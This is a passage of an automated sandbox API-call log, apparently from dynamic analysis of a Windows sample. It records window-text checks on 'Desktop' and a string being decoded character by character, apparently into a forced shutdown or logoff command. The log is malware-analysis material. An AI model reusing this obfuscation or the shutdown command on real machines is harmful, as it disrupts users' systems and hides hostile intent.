cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.855] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.856] SysStringLen (param_1="Desk") returned 0x4 [0201.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Desk", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desk", lpUsedDefaultChar=0x0) returned 5 [0201.856] SetWindowTextA (hWnd=0x103c4, lpString="Desk") returned 1 [0201.856] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0201.856] GetFocus () returned 0x0 [0201.856] lstrlenA (lpString="Desk") returned 4 [0201.856] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0201.857] IsWindow (hWnd=0x103c4) returned 1 [0201.857] IsWindow (hWnd=0x103c4) returned 1 [0201.857] IsWindow (hWnd=0x103c4) returned 1 [0201.857] IsWindow (hWnd=0x103c4) returned 1 [0201.858] GetFocus () returned 0x0 [0201.858] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0201.858] GetFocus () returned 0x0 [0201.858] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0201.858] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0201.858] GetFocus () returned 0x0 [0201.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desk", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0201.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desk", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Desk") returned 5 [0201.859] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.859] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0201.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.860] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0201.860] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.861] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0201.861] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.861] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.862] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.862] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.863] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.864] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.864] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.864] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.865] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.865] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.865] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.866] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.866] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.867] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.916] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.917] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.917] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.918] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.919] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.919] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.920] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.920] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.921] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.921] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.921] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.922] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.922] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.922] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.923] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.923] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.924] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.924] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.925] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.925] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.926] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.926] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.927] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.927] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.928] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.928] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.928] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.930] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.930] GetForegroundWindow () returned 0x2035c [0201.930] GetLastError () returned 0x0 [0201.930] SysStringLen (param_1=" ") returned 0xff [0201.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.931] SysStringLen (param_1=" ") returned 0xff [0201.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.931] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.931] GetLastError () returned 0x0 [0201.931] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.931] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.932] SysStringLen (param_1="Desk") returned 0x4 [0201.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Desk", cchWideChar=5, lpMultiByteStr=0x11684fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desk", lpUsedDefaultChar=0x0) returned 5 [0201.932] SetWindowTextA (hWnd=0x103c4, lpString="Desk") returned 1 [0201.932] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0201.932] GetFocus () returned 0x0 [0201.932] lstrlenA (lpString="Desk") returned 4 [0201.933] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0201.933] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Desk") returned 4 [0201.933] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0201.933] GetFocus () returned 0x0 [0201.933] lstrcmpA (lpString1="Desk", lpString2="Desk") returned 0 [0201.933] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.933] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0201.933] GetFocus () returned 0x0 [0201.933] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0201.934] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0201.934] GetFocus () returned 0x0 [0201.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desk", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0201.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desk", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=5 | out: lpWideCharStr="Desk") returned 5 [0201.934] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.934] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0201.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.935] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0201.935] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.936] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0201.936] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.937] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0201.937] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.938] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, 